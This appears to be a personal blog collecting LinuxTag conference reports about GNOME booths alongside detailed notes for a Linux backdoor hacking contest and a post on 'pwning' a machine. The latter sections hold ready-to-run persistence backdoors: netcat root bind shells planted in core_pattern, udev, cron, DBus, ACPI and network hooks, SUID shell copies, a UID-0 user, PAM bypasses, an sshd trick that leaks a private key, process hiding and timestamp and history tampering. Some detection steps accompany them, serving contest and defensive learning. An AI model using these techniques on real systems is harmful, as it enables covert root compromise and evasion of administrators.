LinuxTag 2014

I attended LinuxTag 2014 in Berlin. The event reinvented itself again, after it lost attraction is the recent years. We, GNOME, couldn’t even get enough volunteers to have a presence there. In Berlin. In perfect spring time. Other projects were struggling, too. For this year, they teamed up with re:publica and AndroidCon. The venue changed and the new format of the event made it more attractive and made a good number of people attend.

The venue was “Die Station“, apparently used by those Web people for their Web conference for a couple of years now. It has much more character than the expo in the west where LinuxTag used to be located. But it’s also a bit too unpolished to have a proper conference there. It’s very nice for the fair or expo part of LinuxTag, but not so nice for the conference part. The problem is the rooms. The infrastructure does not really allow for a nice conferency feeling. E.g. many plastic chair made the seats for the audience, the rooms were right next to each other and not sound proof so that you could hear the other talk from the other room. Some lecture halls were actually not really separated from the corridor, so people were walking by and making noise. As for the noise: Except for two big stages, the audio was really bad. I can’t really tell why, but I guess nobody actually tested whether the microphones would sound alright…

While I was grateful to be invited to give a talk on GNOME, I think someone in the organisation team didn’t like me 😉 The conference party started at 18:00 that day and my talk was scheduled for the last slot at 21:30. So I had to compete with the beer outside and other talks in the slot that I wanted to see myself. At least I only had very motivated people in the audience 😉

The LinuxTag deserves its name as it’s unusually kernel focussed for a “normal user” event. As in depth kernel session do not necessarily make sense for the every day computer user, teaming up with DroidCon seemed promising. But the two events were too separated. I actually have not seen any schedule for the DroidCon. And I couldn’t find a joint schedule anywhere on the Internet nor in the venue itself. I don’t think it’s bad intentions, though. It’s probably due to lacking resources to pull it off. A big thank thank you to the organisers. I think it’s an important event that connects many people, especially those from the Industry with the Community. Keep rocking, guys.

LinuxTag 2012

At this time of the year, there is a special thing happening in Berlin. It’s the annual LinuxTag, a mix of conference and expo. And again, we (GNOME) had a booth.

We shared the space with our friends from Qt and KDE, as we already did for last FOSDEM, and we got along quite well. It’s good to see friends again and again.

The critics from last events, i.e. FOSDEM and LinuxTag, were incorporated. So I did get enough tape, glue, T-Shirts and even a rollup-display *yay* Thanks to the GNOME Foundation for providing resources.

However, compared to last year we had less material, because only one EventsBox was available and we had less furniture for the booth, because LinuxTag lacks sponsors. So we had to deal with non ideal situations, but well, that’s how it always goes, no? And as we are engineers, we managed quite well, I’d say.

Unfortunately, we didn’t have any GNOME talk, so this is something that is definitely to improve for next year. You can already think about cool things to present in lovely Berlin. Interestingly enough, the computer, we used to demo GNOME, was very stable. Obviously, I wanted to show the freshest GNOME release, which was 3.4, but so far no distribution had a stable release which included the newest GNOME. So I used a Fedora 17 Beta and well, some things crashed (reliably) but it was still very smooth. The webcam was the most annoying piece of hardware. But well, it was stolen quite early so we didn’t have to bother too much about it 😉 So yeah, if you happen to have a spare webcam that works with a recent Linux and Cheese, we’d happily incorporate that into our EventsBox.

Generally though, people were interested in the newest developments and we had nice chats about the past and the future of GNOME. Unlike last year, we probably did not convince anybody to go to GUADEC (as it’s now in Spain and not in Berlin) 😉 We also couldn’t convice too many people to buy T-Shirts. The dark green one from second last FOSDEM were quite popular but as they are old, we only had 4 to sell.

A big thank you to all the people helping out at the booth and of course to LinuxTag for providing us with the opportunity to present ourselves.

The talks I’ve seen, which were not many, as I’ve spent much time at the booth, were not really exciting. I’ve seen Ulrich Drepper talking about Lock Free Data Structures on modern CPUs which was, well, a bit slow for me. He seems to be very knowledgeable but I think he presumed the audience not to be. Anyway, apparently modern Intel CPUs can do transactional memory and you can even now write code that uses that feature in the future while staying compatible with today’s CPUs. You need a new enough toolchain though.

Some other guy talked about forking. I was curious but he delivered his story about forking Nagios only. He didn’t mention any problematic fact at all and was mainly concerned about establishing an own brand.

Christoph Wickert does the Beefy Miracle

I followed “Distro Battle” for a short period of time. Basically, five contestants were about to solve some problems a user could face with her distribution. So Mageia, Fedora, Debian, Kubuntu and OpenSuSE with their respective representative should solve problems like “install this printer” or “use this 3G USB dongle”. They had the chance to introduce themselves first. Mageia was running LXDE, Fedora had a GNOME 3.2, Debian a GNOME 2 and Kubuntu and OpenSuSE were running some recent KDE version. The Kubuntu representative introduced her distro by showing how easy it was to install the whole non-free packages and by stating this would be the very first thing you wanted to do on your fresh install. Funnily enough, Kubuntu self-destructed with a reboot into memcheck. Apparently, she aborted the install at a very unpleasant moment while there was no kernel ready. So the GRUB menu didn’t have any other option than memcheck. The non-GNOME desktops failed getting the 3G dongle to work while NetworkManager sorted that out on the GNOME desktops. The printing failed completely in OpenSuSE because they used their Zast-Tool; and Debian had a minor issue with ZeroConf not working.

So it’s quite a funny concept this “Distro Battle” although nowadays the GNU/Linux base is rather streamlined, isn’t it? So it doesn’t matter much which distro you use in order to get a printer or 3G dongle running unless you try to implement your own stuff.

LinuxTag Hacking Contest Notes

As I wrote the other day, I have been to LinuxTag in Berlin. And Almost like last year a Hacking contest took place.

LinuxTag 2011 - Hacking Contest

The rules were quite the same: Two teams play against each other, each team having a laptop. The game has three rounds of 15 minutes each. In the first round the teams swap their laptops so that you have the opponents machine. You are supposed to hide backdoors and other stuff. In the second round the laptops are swapped back and you have to find and remove these backdoors. For the third round the laptops are swapped once again and you can show off what backdoors were left in the system.

So preparation seems to be the obvious key factor for winning. While I did prepare some notes, they turned out to not be very good for the actual contest, because they are not structured well enough.

Since the game has three rounds, it makes sense to have a structure with three parts as well. Hence I produced a new set of notes with headlines for each backdoor and three parts per section. Namely Hacking, Fixing and Exploiting.

The notes weren’t all ready just before the contest and hence we didn’t score pretty well. But I do think that our notes are quite cool by now though. Next time, when we’re more used to the situation and hopefully learned through suffering to not make all those tiny mistakes we did, we might play better.

So enjoy the following notes and feel free to give feedback.

Set Keyboard to US English:

setxkbmap us
export HISTFILE=/dev/null
ln -sf ~/.bash_history /dev/null
ln -sf ~/.viminfo /dev/null

while true; do find / -exec touch {} \; ; sleep 2; done


1
  passwd new user

Remote
root


1.1
  Hacking

nano /etc/passwd

copy and paste root user to a new user, i.e. hackr.

sudo passwd hackr


1.2
  Fixing

grep :0: /etc/passwd


1.3
  Exploiting

ssh hackr@localhost


2
  dePAMify

Remote
root


2.1
  Hacking

cd /lib/security/
cp pam_permit.so pam_deny.so
echo > /etc/pam.d/sshd
/etc/init.d/sshd restart


2.2
  Fixing

too hard


2.3
  Exploiting

ssh root@localhost

enter any password


3
  NetworkManager

Remote
root


3.1
  Hacking

nano /etc/NetworkManager/dispatcher.d/01ifupdown <<EOF
nc.traditional -l -p 31346 -e /bin/bash &
cp /bin/dash /etc/NetworkManager/dhclient
chmod +s /etc/NetworkManager/dhclient
EOF


3.2
  Fixing

ls /etc/NetworkManager/dispatcher.d/


3.3
  Exploiting

less /etc/NetworkManager/dispatcher.d/

Disconnect Network via NetworkManager

Connect Network via NetworkManager

/etc/NetworkManager/dhclient

netcat localhost 31346


4
  SSHd

Remote
root


4.1
  Hacking

su -
ssh-keygen
cd
cat .ssh/id_rsa.pub | tee /etc/ssh/authorized_keys
cat .ssh/id_rsa | tee /etc/issue.net
cp /etc/ssh/sshd_config /tmp/
nano /etc/ssh/sshd_config <<EOF
AuthorizedKeysFile /etc/ssh/authorized_keys
Banner /etc/issue.net
EOF

/etc/init.d/ssh reload
mv /tmp/sshd_config /etc/ssh/


4.2
  Fixing

less /etc/ssh/sshd_config

/etc/init.d/ssh reload


4.3
  Exploiting

ssh root@localhost 2> /tmp/root
chmod u=r,go= $_
ssh  -i /tmp/root root@localhost


5
  xinetd

Remote
root


5.1
  Hacking

cp  /etc/xinetd.d/chargen  /etc/xinetd.d/chargen.bak

nano /etc/xinetd.d/chargen <<EOF

disable = no
DELETE type = INTERNAL
server = /bin/dash
EOF

/etc/init.d/xinetd restart

mv /etc/xinetd.d/chargen.bak  /etc/xinetd.d/chargen


5.2
  Fixing

grep disable  /etc/xinetd.d/* | grep no


5.3
  Exploiting

nc localhost chargen


6
  Apache

Remote
root

Needs testing


6.1
  Hacking

nano /etc/apache2/sites-enabled/000-default

DocumentRoot /
Make <Directory />  and copy allowance from below

/etc/init.d/apache2 restart

touch /usr/lib/cgi-bin/fast-cgid
chmod a+rwxs $_
touch /usr/lib/cgi-bin/fast-cgid.empty
chmod a+rwxs $_
nano /usr/lib/cgi-bin/fast-cgid <<EOF
    #!/bin/bash
    IFS=+
    $QUERY_STRING
EOF

nano /etc/sudoers <<EOF
www-data ALL=NOPASSWD: ALL
EOF


6.2
  Fixing

ls -l /usr/lib/cgi-bin/

nano /etc/apache2/sites-enabled/*

/etc/init.d/apache2 restart


6.3
  Exploiting

links2 http://localhost/  # Remote file access
links2 http://localhost/cgi-bin/fast-cgid?id # Remote command execution
grep NOPASS /etc/sudoers  # local privilege escalation
links2 http://localhost/cgi-bin/fast-cgid?sudo+id # Remote root command execution

nano /usr/lib/cgi-bin/fast-cgid.empty <<EOF
/bin/dash
EOF

/usr/lib/cgi-bin/fast-cgid.empty # local privilege escalation


7
  screen

Local
root


7.1
  Hacking

sudo chmod u+s /bin/dash
sudo mkdir -p /etc/screen.d/user/
sudo chmod o+rwt /etc/screen.d/user/
# NOW AS USER!!1
SCREENDIR=/etc/screen.d/user/ screen
# IN THE SCREEN
dash
C-d


7.2
  Fixing

ls -l /var/run/screen
rm -rf /var/run/screen/*

sudo lsof | grep -i screen | grep FIFO
rm these files


7.3
  Exploiting

SCREENDIR=/etc/screen.d/user/ screen -x


8
  hidden root dash

Local
root


8.1
  Hacking

cp /bin/dash /usr/bin/pkexec.d
chmod +s !$
cp /bin/dash /etc/init.d/powersaved
chmod +s !$


8.2
  Fixing

find / \( -perm -4000 -o -perm -2000 \) -type f -exec ls -la {} \;

rm these files


8.3
  Exploiting

/etc/init.d/powersaved

/usr/bin/pkexec.d


9
  DHCP Hook

Local
Remote
root


9.1
  Hacking

nano /etc/dhcp3/dhclient-exit-hooks.d/debug <<EOF
nc.traditional -l -p 31347 &
cp /bin/dash /var/run/dhclient
chmod +s /var/run/dhclient
EOF


9.2
  Fixing

ls -l /etc/dhcp3/dhclient-exit-hooks.d/
ls -l /etc/dhcp3/dhclient-enter-hooks.d/


9.3
  Exploiting

Reconnect Network via DHCP

/var/run/dhclient

netcat localhost 31347


10
  ConsoleKit

Local
root

Switchen VTs is triggered locally only, although one might argue that switching terminals is done every boot. Hence it’s kinda automatic.


10.1
  Hacking

sudo -s
touch /usr/lib/ConsoleKit/run-seat.d/run-root.ck
chmod a+x /usr/lib/ConsoleKit/run-seat.d/run-root.ck
nano /usr/lib/ConsoleKit/run-seat.d/run-root.ck

#!/bin/sh

chmod u+s /bin/dash
nc.traditional -l -p 31337 -e /bin/dash &


10.2
  Fixing

ls /usr/lib/ConsoleKit/run-seat.d/

Only one symlink named udev-acl.ck is supposed to be there.


10.3
  Exploiting

ls /usr/lib/ConsoleKit/run-seat.d/

Switch TTY (Ctrl+Alt+F3)

execute /bin/dash

nc IP 31337


11
  SIGSEGV

Local
root


11.1
  Hacking

echo '|/bin/nc.traditional -l -p 31335 -e /bin/dash' > /proc/sys/kernel/core_pattern


11.2
  Fixing

cat /proc/sys/kernel/core_pattern
echo core > /proc/sys/kernel/core_pattern


11.3
  Exploiting

ulimit -c unlimited

sleep 1m & pkill -SEGV sleep

nc localhost 31335


12
  nc wrapper

Remote
Local
root


12.1
  Hacking

setxkbmap us
cd /tmp/
cat > dhclient.c <<EOF
#include <unistd.h>

int main (int argc, char* args[]) {
    int ret = fork ();
    if (ret == 0) {
        chmod("/bin/dash", 04755);
        execlp ("/usr/bin/nc.traditional", "nc.traditional",
            "-l" ,"-p", "31339", "-e", "/bin/dash", (char*) NULL);
    } else
        execvp("/sbin/dhclient6", args);
    return 0;
}
EOF

/etc/init.d/networking stop                # Or disable via NotworkManager
make dhclient
cp /sbin/dhclient /sbin/dhclient6
cp dhclient /sbin/dhclient
cp dhclient /etc/cron.hourly/ntpdate
cp dhclient /sbin/mount.btrfs
cp dhclient /usr/lib/cgi-bin/cgi-handler
chmod ug+s /sbin/mount.btrfs /usr/lib/cgi-bin/cgi-handler
rm dhclient.c
/etc/init.d/networking start               # Or enable via NotworkManager


12.2
  Fixing


12.3
  Exploiting


12.3.1
  real dhclient

Disconnect with Network Manager

Connect with NetworkManager

dash

nc localhost 31339


12.3.2
  cron

Just wait. Or reboot.


13
  evbug

Remote

Writes Keycodes to syslog.
Type: 1 are keypresses, and “code” is the actual keycode.
evtest shows which key maps to which keycode.

Unfortunately, Debian does not seem to have that module.


13.1
  Hacking

modprobe evbug
%FIXME: Maybe pull netconsole

nano /etc/modprobe.d/blacklist.conf


13.2
  Fixing

modprobe -r evbug


13.3
  Exploiting

dmesg | grep  "Type: 1"


14
  Vino

Remote


14.1
  Hacking

sudo -s
xhost +
nohup /usr/lib/vino/vino-server &
vino-preferences


14.2
  Fixing

vino-preferences

ps aux | grep vnc


14.3
  Exploiting

vncviewer IP


15
  GDM InitScript

Local
Remote
root


15.1
  Hacking

nano /etc/gdm/Init/Default <<EOF
cp /bin/dash /etc/gdm/gdm-greeter
chmod +s /etc/gdm/gdm-greeter
nc.traditional -l -p 31345 -e /bin/dash &
EOF


15.2
  Fixing

less /etc/gdm/Init/Default


15.3
  Exploiting

Log off

Log on

/etc/gdm/gdm-greeter

nc localhost 31345


16
  shadow a+rw

Local
root


16.1
  Hacking

chmod a+rw /etc/shadow


16.2
  Fixing

ls -l /etc/shadow

chmod u=rw,g=r /etc/shadow


16.3
  Exploiting

nano /etc/shadow


17
  SysV Init Alt+Up

Local
root


17.1
  Hacking

touch /etc/init.d/throttle
chmod a+x $_
nano $_ <<EOF
#!/bin/sh
exec </dev/tty13 >/dev/tty13 2>/dev/tty13
exec /bin/bash
EOF

nano /etc/inittab <<EOF
kb::kbrequest:/etc/init.d/throttle
EOF

init q


17.2
  Fixing

nano /etc/inittab


17.3
  Exploiting

Ctrl+Alt+F1, Alt+Up, Alt+Left


18
  SysV Init Ctrl+Alt+Del

Local
root


18.1
  Hacking

nano /etc/inittag <<EOF
ca:12345:ctrlaltdel:chmod +s /bin/dash
EOF

init q


18.2
  Fixing

nano /etc/inittag


18.3
  Exploiting

Ctrl+Alt+F1, Ctrl+Alt+Del, dash


19
  SysV Init tty14

Local
root


19.1
  Hacking

nano /etc/inittag <<EOF
14:23:respawn:/bin/login -f root </dev/tty14 >/dev/tty14 2>/dev/tty14
EOF

init q


19.2
  Fixing

less /etc/inittag


19.3
  Exploiting

Ctrl+Alt+F1, Alt+Left


20
  DBus Root Service

Local
root


20.1
  Hacking

cd /usr/share/dbus-1/system-services/
cp org.freedesktop.org.UPower org.Rootme.Remotely.service
nano org.Rootme.Remotely.service << EOF
[D-BUS Service]
Name=org.Rootme.Remotely
Exec=/bin/nc.traditional -l -p 31343 -e /bin/dash
User=root
EOF

cp org.freedesktop.org.UPower org.Rootme.Locally.service
nano org.Rootme.Locally.service << EOF
[D-BUS Service]
Name=org.Rootme.Locally
Exec=/bin/chmod u+s /bin/dash
User=root
EOF



20.2
  Fixing

grep Exec /usr/share/dbus-1/system-services/*.service


20.3
  Exploiting

dbus-send -system -print-reply -dest='org.Rootme.Locally' /org/Rootme/Locally org.Rootme.Locally

dbus-send -system -print-reply -dest='org.Rootme.Remotely' /org/Rootme/Remotely org.Rootme.Remotely

nc localhost 31343

dash


21
  Crontabs

Local
Remote
root


21.1
  Hacking

touch /etc/cron.d/pamd
chmod a+x /etc/cron.d/pamd
nano /etc/cron.d/pamd <<EOF
*/2 * * * *   root  cp /bin/dash /usr/share/gdm/chooser
*/2 * * * *   root  chmod +s /usr/share/gdm/chooser
EOF

touch /etc/cron.d/dhclient
chmod a+x /etc/cron.d/dhclient
nano /etc/cron.d/dhclient <<EOF
*/2 * * * *   root  /sbin/mount.btrfs
EOF


21.2
  Fixing

sudo ls -l /var/spool/cron/crontabs/ /etc/cron.*/


21.3
  Exploiting

ls -l /etc/cron.d/dhclient /etc/cron.d/pamd /usr/share/gdm/chooser

Wait

/usr/share/gdm/chooser

nc -l localhost 31339


22
  udev

Localroot

udev is responsible for devices being attached to Linux.
It is able to trigger commands on certain hardware.
Under the assumption that a Laptop will have a rfkill switch, one could write the following rules.
Note that the commands block, i.e. to hit the second rule, the first program must exist.
udev automatically reloads the rules.


22.1
  Hacking

nano /lib/udev/rules.d/99-rfkill.rules <<EOF
SUBSYSTEM=="rfkill", RUN +="/bin/nc.traditional -l -p 31337 -e /bin/sh"
SUBSYSTEM=="rfkill", RUN +="/bin/chmod +s /bin/dash"
EOF


22.2
  Fixing

grep RUN /lib/udev/rules.d/* /etc/udev/rules.d/

but too hard


22.3
  Exploiting

toggle rfkill via hardware switch

nc localhost 31344

dash


23
  ACPI Powerbtn

Local
root


23.1
  Hacking

nano /etc/acpi/powerbtn.sh <<EOF
nc.traditional -l -p 31348 -e /bin/sh
/bin/chmod +s /bin/dash
EOF


23.2
  Fixing

ls /etc/acpi/

less /etc/acpi/powerbtn.sh


23.3
  Exploiting

Press power button

nc localhost 31348

dash


24
  PolicyKit GrantAll

Local
root

Note that this reflects policykit 0.96 which has a deprecated config file syntax.


24.1
  Hacking

nano /usr/share/polkit-1/actions/org.freedesktop.policykit.policy

change org.freedesktop.policykit.exec to read
    <defaults>
      <allow_any>yes</allow_any>
      <allow_inactive>yes</allow_inactive>
      <allow_active>yes</allow_active>
    </defaults>

pkill polkitd


24.2
  Fixing

nano /usr/share/polkit-1/actions/org.freedesktop.policykit.policy

change org.freedesktop.policykit.exec to read
      <allow_any>auth_admin</allow_any>
      <allow_inactive>auth_admin</allow_inactive>
      <allow_active>auth_admin</allow_active>

pkill polkitd


24.3
  Exploiting

pkexec id


25
  decoy timestamps

No hack in the traditional sense but stuff that one might need to do.


25.1
  Hacking

for i in `find /etc/ /bin/ /sbin/ /var/spool/
          /var/run /usr/lib/ConsoleKit /usr/share/dbus-1/ /usr/share/polkit-1/`; do
    touch $i; done
export HISTFILE=/dev/null
rm ~/.*history*


25.2
  Fixing


25.3
  Exploiting

find / -mtime -1

find / -ctime -1

GNOME at LinuxTag 2011

Last week, I had the pleasure to attend LinuxTag and manage the GNOME booth. All in all, the GNOME booth went quite well. We had loads of visitors wanting to see the new GNOME Shell and discuss its design. But it was such a busy time that I didn’t even had the opportunity to leave the booth and look at all the other projects. It was, however, pretty nice. It took me a day to recover though. Being at the booth for all the four conference days in a row from (ideally) 09:00 until 18:00, always smiling and entertaining was quite exhausting.

To help the GNOME presence: I printed flyers and posters all day before LinuxTag. It was a pain to do, because we are lacking good material. We do have some Brochures to print out, but they are either outdated or in a miserable quality. It definitely needs some quality brochures for GNOME. We have more Posters and some of them are really nice. But I couldn’t render some of them because of bugs somewhere in the stack. Anyway, I managed to print posters on A4 paper which meant that they had to be glued together… To ease poster printing in the future, I uploaded the PDFs I generated to the wiki.

What worked well was our booth setup: We had Posters, Sticker, Flyers and (thanks to openSuSE) GNOME 3 Live DVDs to give away. Also our booth looked nice with GNOME banners hanging from the walls. Also, the ordered furniture looked nice to the outside, i.e. a presenter desk, a long cupboard and a bar table together with bar chairs made it look inviting. However, we lacked a small table and some chairs to cater for the many friends that were in the booth and not in front. Thanks to all the helping people. It was really awesome how quickly our booth looked nicely.

And fortunately, there is room for improvement. It would have been nice if we brought, i.e. T-Shirts to sell or Posters and Flyers for the GUADEC. But everything was still really okay. I hope we manage to do so well next year, too.

So thanks to Canonical for the EventsBox and openSuSE for the DVDs! If you happen to be in the need of some of the DVDs, give me a shout and we’ll arrange the shipping.

LinuxTag and Cream Desktop

I’ve been to LinuxTag in Berlin and meeting old and new people was quite nice. In fact, I had to opportunity to play Skat after a very long time 🙂

Unfortunately, there was no GNOME booth! (Well and no Fedora booth either) That’s a pity and I wonder what it takes to successfully run a booth next year. The Debian guys, however, rocked. They were well equipped and had enough people that care.

from last years LinuxTag though

Again, I took part in the Hacking Contest. I couldn’t last year but made up my mind how to tackle that contest best. Sadly, it was a bit different this year. I didn’t really have a team and we were not prepared for German a keyboard layout or not having “netcat” installed. This got us quite confused and although we had a (bad) set of notes, we didn’t really follow them… So we got beaten up quite heavily 😉 Maybe I’ll invest more time for preparation next year.

I was amazed by Cream Desktop though! Sadly, their screenshots don’t work atm, but they basically want to revamp GNOME and make it better 😉 Sounds ambitious and it probably is. For now, they have “Melange”, a widget system for the desktop. (think desklets). It’s visually very appealing and I think it’d enhance the GNOME desktop (I could finally get rid of my gkrellm…).

Sadly, I didn’t meet the Cream guys on the LinuxNacht which kinda sucked. The location was awesome: A beach club facing the Spree. But the food was very disappointing. It was way better two years ago…

g0t r00t? pwning a machine

Imagine you have root access to a machine for, say, 15 minutes. Or better: Imaging you have accidentally left your machine unattended for about 900 seconds and once you’re back, you’re wondering, what an attacker could have done.

I’ll explain a few simple and quick attacks which will have a rather high impact. The main motivation came from the Hacking Contest at the LinuxTag in Berlin. It’s rules in short are: Have your laptop backdoored in 15 minutes by the opponent team while you backdoor theirs, clean your computer in 15 minutes and exploit the opponents laptop in the following 15 minutes.

core pattern

You can give the kernel a crash handler which will be executed if a segfault happens. Ubuntu uses that to launch apport and you can hijack this feature to have your rootshell executed:

   echo '|/bin/nc.traditional -l -p 31337 -e /bin/sh' | sudo tee /proc/sys/kernel/core_pattern
   gedit & kill -SEGV %%

You see, it’s pretty simple, quick to install and it’s powerful as well. You can now connect to localhost 31337 to have a rootshell. Of course you could launch connect back shells or any other malicious program.

To counter this threat, you might want to read this core_pattern file or in doubt erase the signal handler:

  echo '' | sudo tee /proc/sys/kernel/core_pattern

cronjobs

You know cronjobs, don’t you? But do you know the cronjobs of the “games” or “mysql” user? And have you checked your /etc/cron.*/? You better do 😉 Because installing malicious scripts there is pretty simple:

  for u in root games mysql; do sudo crontab -e -u $u; done
  5 * * * * /bin/nc.traditional -l -p 31337 -e /bin/sh

You might want to copy a file with the above mention cron string to  /etc/cron.hourly/ and /etc/cron.d/.

If you are a smart attacker, you have multiple lines containing the same job, especially one line after 1000 newlines, so that the admin has to scroll years to find it…

To counter this, check your cronjobs: sudo ls -l /var/spool/cron/crontabs/ /etc/cron.*/

dash backdoor

If you run a program which has the SUID bit set, then you have the rights of the user owning that file. That can be useful for ping or passwd, but probably isn’t for a shell. That’s why you can’t set the SUID bit on the bash. The “dash”, however, allows that 🙂

  sudo cp /bin/dash /bin/ping4 && sudo chmod u+s /bin/ping4

To find SUID binaries: find / ( -perm -4000 -o -perm -2000 ) -type f -exec ls -la {} ;

You’ll get a rootshell by simply executing ping4.

hide processes (with listening sockets) from ps and lsof

mkdir /tmp/empty
/bin/nc.traditional -l -p 31337 -e /bin/sh &
ps aux | grep $!
sudo mount --bind /tmp/empty /proc/$!
ps aux | grep $!

Countermeasure: netstat -tulpe and checking cat /proc/$$/mountinfo for suspicious mounts over /proc/.

udev exploit device

The idea is to plug an exploit device into that machine and have a rootshell.

I plugged a usb mouse into the laptop, viewed dmesg or udevadm monitor to find the devices ID, which then can be used with udevadm info --path:

  udevadm info --attribute-walk --path=/devices/pci0000:00/0000:00:1d.0/usb5/5-1/5-1:1.0/input/input18

That’ll produce udev attributes which can be used to write rules, e.g.

  SUBSYSTEM=="input", RUN+="/bin/nc.traditional -l -p 31337 -e /bin/sh"

You want to hide that /etc/udev/rules.d or better /lib/udev/rules.d/.

To counter this threat, you have no choice besides:

  grep -rn RUN /etc/udev/rules.d/ /lib/udev/rules.d/

which is unfortunately not that easy.

PAM deauthentify

Most of the time, PAM is the central place for all services to authenticate a user. While configuring PAM is not the most exciting thing I know, you can exploit it without actually know anything about the modules or the syntax.

Simply replace  pam_deny with pam_permit in /etc/pam.d/common-auth:

"auth   requisite           pam_permit.so"

To counter modified PAM rules, there’s nothing you can do besides reading your rules 🙁 If you go down this rabbit hole, bring a flashlight.

A better hack would be to replace the deny module with the permit module! cd /lib/security; ln -f pam_permit.so pam_deny.so

If it’s hardlinked like about, you can find these with

find . -links +1

if it’s copied, instead of hardlinked, you have to compare file hashes or better reinstall libpam-modules.

rewrite sshd config

Public key authentication is very convenient, because you don’t have to remember passwords. Also you can you hijack accounts easily if you add your public key to the files with authorized keys 😉

cat ~/.ssh/id_rsa.pub | sudo tee /root/.wgetrc
cp /etc/ssh/sshd_config /tmp/
Put AuthorizedKeysFile %h/.wgetrc in /etc/ssh/sshd_config
Put Banner /etc/issue.net in /etc/ssh/sshd_config
sudo /etc/init.d/ssh reload
mv /tmp/sshd_config /etc/ssh/
cat ~/.ssh/id_rsa | sudo tee /etc/issue.net

This probably needs some explanation.We first copy the public key into an innocent looking file, then save the original SSHd configuration, before we edit it and put those configuration strings in it. By reloading the SSHd it’ll recognize the new configuration and we then mv the original config back! That way, the admin doesn’t see anything suspicious but the SSHd will run with your configuration! *yay*. In order to use the stored private key, we’ll blow it out to the world by putting it into the SSHd banner 😉

To counter this, either patch your sshd that it’ll immediately reload once the configuration file has been change using inotify (udev does that) or review your SSHd config and reload it even if you haven’t changed anything!

New Users with UID 0

For some reason, it is not important that a user is named “root”, but that it’s uid is 0. So if you create a user with the uid 0, you’ll have root privileges 🙂 Multiple users with the same uid but different name isn’t harmful. So combining this with the 1000 scrolllines trick mentioned above, you have to do something like this:

echo 'hackr:x:0:0:hackr,,,:/home/hackr:/bin/bash' | sudo tee -a /etc/passwd
printf %sn%s hackr hackr | sudo passwd hackr

add 1000 lines to the passwd file and do the things above again.

To counter, grep ':0:' /etc/passwd

Vino

GNOME ships a VNC Server which can be activated with vino-preferences. Or for the lazy people:

gconftool-2 --set /desktop/gnome/remote_access/enabled --type bool true
gconftool-2 --set /desktop/gnome/remote_access/prompt_enabled --type bool false
gconftool-2 --set /desktop/gnome/remote_access/view_only --type bool false

Timestamps

If you want to find files which have been recently modified, you can used “find”:

To find last modified files:

  find -mtime -1 /

Or recently created files

  find -ctime -1 /

If you have a reference file:

  find -newer /path/to/file

To hide your changes to a file, you can use “find” with “touch” to either simply touch the files to give them the current timestamp, or give them a the timestamp of a reference file:

  find /tmp/ -exec touch --reference=/path/to/file '{}' ;
Creative Commons Attribution-ShareAlike 3.0 Unported
This work by Muelli is licensed under a Creative Commons Attribution-ShareAlike 3.0 Unported.